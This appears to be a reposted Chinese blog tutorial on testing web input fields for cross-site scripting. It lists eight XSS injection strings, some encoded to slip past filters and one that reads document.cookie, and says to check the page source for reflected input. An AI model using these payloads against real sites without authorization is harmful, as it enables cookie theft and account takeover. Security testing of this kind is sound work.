xss注入方法及验证方法

Posted 区块链小哥

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了xss注入方法及验证方法相关的知识,希望对你有一定的参考价值。

1在任一输入框中输入以下注入字符

>"'><script>alert(XSS)</script>

>"'><img src="javascript:alert(123456)">

1234<%00script>alert("123456")</script>

&{alert(123456)}

>%22%27><img%20src%3d%22javascript:alert(123456)%22>

[rm]"><img src=1 onerror=alert(document.cookie)>[/rm]

\u003cimg src=1 onerror=alert(/xss/)\u003e

\x20\x27onclick\x3dalert\x281\x29\x3b\x2f\x2f\x27

2提交成功后,在读取参数的页面查看页面源码,搜索刚输入注入


以上是关于xss注入方法及验证方法的主要内容,如果未能解决你的问题,请参考以下文章

安全测试:xss注入方法

防止XSS注入的方法

xss和sql注入学习1

关于SpringBoot过滤器过滤get及post请求中的XSS和SQL注入

安全漏洞XSS、CSRF、SQL注入以及DDOS攻击

防止SQL注入和XSS注入的方法总结